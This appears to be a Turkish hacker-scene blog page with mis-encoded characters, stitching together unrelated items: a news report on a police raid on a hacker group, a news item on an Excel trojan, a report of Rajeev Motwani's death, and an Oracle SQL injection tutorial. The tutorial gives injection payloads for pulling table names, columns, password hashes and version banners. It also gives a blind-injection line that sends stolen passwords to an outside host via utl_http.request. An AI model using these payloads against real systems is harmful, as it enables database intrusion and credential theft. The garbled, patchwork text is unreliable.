[ + ] DiyarbakırLı Uzi ~ Wampir-Child ~

Åžanlıurfa‘da Yapılan Operasyonda, Terör Örgütü PKK Adına Çalışan ve Kendilerine ‘Dengesiz Team’ Adını Verdikleri Hacker Timi Çökertildi.

Åžanlıurfa‘da yapılan operasyonda, terör örgütü PKK adına çalışan ve kendilerine ‘Dengesiz Team’ adını verdikleri hacker timi çökertildi.

Åžahısların, ÅŸimdiye kadar 600 bin kredi kartı bilgilerine ulaÅŸarak milyonlarca TL’lik para akışını gerçekleÅŸtirdikleri ve aynı zamanda baÅŸta AK Parti ve MHP olmak üzere birçok siyasi partiyi de örgüt adına hackleyerek onun yerine propaganda amaçlı bildiriler yayınladıkları ortaya çıktı.

Alınan bilgiye göre, Åžanlıurfa Emniyet Müdürlüğü Kaçakçılık ve Organize Ä°ÅŸlerle Mücadele ekipleri, 6 ay önce kredi kartı maÄŸduru bir ÅŸahsın ÅŸikayeti üzerine harekete geçerek, PKK‘nın hacker timine götüren bulgulara rastladı.

Polis, söz konusu kiÅŸinin kredi kartından bilgisi ve rızası dışında internet üzerinden çeÅŸitli alışveriÅŸlerin yapıldığını tespit ederek, bu alışveriÅŸlerin internet üzerinden gerçekleÅŸtirildiÄŸi tarihteki IP numarasını kullanan internet abonesinin Åžanlıurfa‘da yaÅŸadığını belirledi.

Kapsamlı yapılan çalışmalar neticesinde, kendilerine ‘Dengesizler Team’ adını veren ve PKK terör örgütü adına kurdukları tespit edilen bir siteye çalışan hacker timine yönelik 6 adrese düzenlenen eÅŸzamanlı operasyonda 3′ü öğrenci, 1′i bayan toplam 6 kiÅŸi gözaltına alındı. Zanlıların ev ve iÅŸyerlerinde yapılan aramada 3 adet diz üstü bilgisayar, çok sayıda cep telefonu, sim kartı, hard disklere ele geçirildi.

Bilişim Suçları Büro Amirliği görevlilerince yapılan incelemede, hard Disk içerisinde yaklaşık 600 adet değişik şahıslara ait kredi kartı bilgisine ulaşıldı. Hacker timinin çeşitli firma, kurum ve kuruluşlara ait onlarca web sitesini hacklediği ve bu siteleri kullanarak, binlerce şahsa ait kişisel bilgileri ele geçirdiği, kendi çıkarları için kullandığı belirlendi.

Hacker timinin lideri Egemen K. ile kız kardeÅŸi Şükran K., Mevlüt Ä°., Yasin A., Mehmet K. ve Murat S., Emniyet Müdürlüğü‘ndeki iÅŸlemlerin ardından adliyeye sevk edildi.

Selam Arkadaslar,
Size Bu Yazımda Oracle Kullanan Sistemlerde Sql Injectionu Anlatıcam.

Şimdi Öncelikle Şöyle Başlayalım,

Oracle , MS yada mysql gibi bir veritabanı altyapısıdır.

Şimdi Biz mysql sistemlerde basit bir union querysini nasıl yapıyoruz,

mys.php?id=-1+union+select+0,user,2,3,4+from+duaL

Aynı Işlem Oracle’da,

ora.php?id=-101 UNION ALL SELECT (SELECT user FROM dual) FROM DUAL

Koduyla Exploitlenebiliyor.

Mysql’de nasıl ,

mys.php?id=-1+union+select+1,group_concat(table_name),3,4+from+information_schema.tables

Şeklinde Tablo Isımlerini Alıyorsak Burdada Keyword Kullanıyoruz Yani

ora.php?id=-1 SELECT table_name FROM all_tables WHERE TABLESPACE_NAME=’keyw0rd’

keyw0rd yazıp exploitimi calıstırırsam database’lerdeki keyw0rd ile ilgili bütün tabloları çekecektir.mantık bu şekilde işler.

Kolonları Çekmek,

mys.php?id=-1+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0×61646d696e–

table_name=0×61646d696e– table_name=0x’den Sonrası Kolonlarını ÇekeceÄŸimiz Tablonun HExlenmiÅŸ Halidir..

Oracledada iÅŸlem,

ora.php?id=-1 SELECT column_name FROM all_tab_columns WHERE table_name = ’TABLOADI’

MySQL’den Artılar Çok Olan Bir Altyapı Ama Biraz Daha Zor Örneğin,

union select 1,2,user(),password()+from+mysql.user gibi(salladım)

bir kodla mysql userının şifresinin hashını ve ismini alabiliyoruz ama oracleda,

SELECT name, password FROM sys.user$ where type#=1

mysqlde

union select 1,2,3,version(),4,5–

gibi bir kodla alabileceÄŸimiz versiyonu oracle’da almak için böyle bir kod çalıştırmamız gerekiyor..

Select banner || ‘-’ || (select banner from v$version where banner like ‘Oracle%’) from v$version where banner like ‘TNS%’

~ Oracle’da Blind Sql Injection Testleri

Blind sql’i 1=0 gibi yöntemlerle test edemiyoruz oracle’da.

* BEGIN DBMS_LOCK.SLEEP(5); END;
* CHR()
* ASCII()
* SUBSTR()
* BITAND()
* LOWER()
Gibi Yöntemler Yanısıra DNS’e Veriyazmaya çalışarak’da Outbanding ile BSQL’i Test Edebiliyor..

OutBanding Kodları,

* SELECT utl_http.request(’http://www.google.com’) FROM DUAL SELECT utl_http.request(’http://www.example.com/?’ || (SELECT pass FROM members) ) FROM DUAL
* SELECT HTTPURITYPE(’http://www.google.com’).getXML() FROM DUAL;

Beni izlemeye devam edin..

Yeni yazıldığı tahmin edilen ve Excel üzerinden yayılan virüs, kullanıcının bilgisayarını perişan ediyor.

Yeni yazıldığı tahmin edilen ve ofislerin vazgeçilmez programlarından biri olan Excel üzerinden yayılan virüs, kullanıcının bilgisayarını virüs göndericinin insafına bırakıyor.

”Truva atı” konseptli virüs, hem Microsoft Windows hem de Apple Mac bilgisayarlarında etkili oluyor.

Geçen hafta görülmeye baÅŸlanan ”Trojan.Mdropper.AC” isimli virüs, .XLS dosya uzantısı olan Excel programının içerisine gömülü olarak yayılıyor. Dosya açıldığı zaman komut dosyası çalışmaya baÅŸlıyor ve virüs göndericinin ”keyfine göre” hizmet etmeye baÅŸlıyor.

Virüs, .XLS uzantılı eski Excel dosyaları ile yayılıyor ve Excel’in yeni versiyonunun dosya uzantısı olan .XLSX’e bulaÅŸamıyor. Ancak yeni Excel yazılımı, eski versiyonları da açabildiÄŸi için risk taşıyor.

Microsoft, güvenlik bülteni ile kullanıcıları dikkatli olmaları konusunda uyarırken, virüsün devre dışı bırakılması için gerekli yazılım üzerinde çalışıldığı da bildirdi.

Öte yandan, antivirüs firması Symantec, virüse karşı Microsoft ile birlikte çalıştığını açıkladı

Google’un kurucusu ve akıl hocası olan profesörün cesedi havuzda bulundu. Esrarengiz ölüm bir parti sabahında oldu

Ä°nternetin bir numaralı arama motoru Google’ın kurucuları arasında yer alan ve akıl hocası olarak bilinen Rajeev Motwani esrarengiz bir ÅŸekilde öldü. Sabah eve gelen bakıcı havuzda profesörün cesedini buldu.

Profesör Rajeev Motwani yüzme öğrenmek istiyordu. Yoğun iş hayatı nedeniyle kendine vakit ayıramayan Rajev Motwani bir türlü yüzme dersi alacak zamanı yaratamadı.

ÖĞRENCİLERİNE PARTİ VERDİĞİ AKŞAM ÖLDÜ

Aynı zamanda Amerika’da Stanford Ãœniversitesi’nde profesör olan Rajeev Motwani geçen cuma akÅŸamı evinde öğrencilerine parti verdi.
Sabah çocukları kontrol etmek için eve gelen bakıcı, bahçedeki yüzme havuzunda profesörün cesediyle karşılaştı. Parti bittikten sonra hava almak için dışarı çıkan profesörün havuza düşerek boğulduğu sanılıyor.

Türk Askerine Ait Mehmetcik.Org Sitesi UzmaN’in Yaptığı Operasyon Sonucu Uyarıldı.

S.a Can Sıkıntısı Bir Blog Sitesi Açım Dedim Herkeze Hayırlı 0lsun